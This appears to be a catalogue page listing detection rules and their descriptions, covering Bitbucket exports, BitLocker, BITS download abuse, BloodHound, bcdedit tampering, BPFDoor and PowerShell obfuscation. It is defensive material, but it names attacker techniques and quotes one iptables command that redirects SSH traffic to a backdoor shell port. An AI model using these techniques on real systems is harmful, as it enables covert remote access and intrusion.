EXPLORE DETECTIONS
Bitbucket User Details Export Attempt Detected
Detects user data export activity.
Bitbucket User Login Failure
Detects user authentication failure events. Please note that this rule can be noisy and it is recommended to use with correlation based on "author.name" field.
Bitbucket User Login Failure Via SSH
Detects SSH user login access failures. Please note that this rule can be noisy and is recommended to use with correlation based on "author.name" field.
Bitbucket User Permissions Export Attempt
Detects user permission data export attempt.
Bitlocker Key Retrieval
Monitor and alert for Bitlocker key retrieval.
BitLockerTogo.EXE Execution
Detects the execution of "BitLockerToGo.EXE". BitLocker To Go is BitLocker Drive Encryption on removable data drives. This feature includes the encryption of, USB flash drives, SD cards, External hard disk drives, Other drives that are formatted by using the NTFS, FAT16, FAT32, or exFAT file system. This is a rarely used application and usage of it at all is worth investigating. Malware such as Lumma stealer has been seen using this process as a target for process hollowing.
BITS Client BitsProxy DLL Loaded By Uncommon Process
Detects an uncommon process loading the "BitsProxy.dll". This DLL is used when the BITS COM instance or API is used. This detection can be used to hunt for uncommon processes loading this DLL in your environment. Which may indicate potential suspicious activity occurring.
BITS Transfer Job Download From Direct IP
Detects a BITS transfer job downloading file(s) from a direct IP address.
BITS Transfer Job Download From File Sharing Domains
Detects BITS transfer job downloading files from a file sharing domain.
BITS Transfer Job Download To Potential Suspicious Folder
Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location
BITS Transfer Job Downloading File Potential Suspicious Extension
Detects new BITS transfer job saving local files with potential suspicious extensions
BITS Transfer Job With Uncommon Or Suspicious Remote TLD
Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.
Bitsadmin to Uncommon IP Server Address
Detects Bitsadmin connections to IP addresses instead of FQDN names
Bitsadmin to Uncommon TLD
Detects Bitsadmin connections to domains with uncommon TLDs
BloodHound Collection Files
Detects default file names outputted by the BloodHound collection tool SharpHound
Boot Configuration Tampering Via Bcdedit.EXE
Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.
BPFDoor Abnormal Process ID or Lock File Accessed
detects BPFDoor .lock and .pid files access in temporary file storage facility
Bpfdoor TCP Ports Redirect
All TCP traffic on particular port from attacker is routed to different port. ex. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392' The traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only.
BPFtrace Unsafe Option Usage
Detects the usage of the unsafe bpftrace option
Browser Execution In Headless Mode
Detects execution of Chromium based browser in headless mode
Browser Started with Remote Debugging
Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks
Buffer Overflow Attempts
Detects buffer overflow attempts in Unix system log files
Bulk Deletion Changes To Privileged Account Permissions
Detects when a user is removed from a privileged role. Bulk changes should be investigated.
bXOR Operator Usage In PowerShell Command Line - PowerShell Classic
Detects powershell execution with that make use of to the bxor (Bitwise XOR). Attackers might use as an alternative obfuscation method to Base64 encoded commands. Investigate the CommandLine and process tree to determine if the activity is malicious.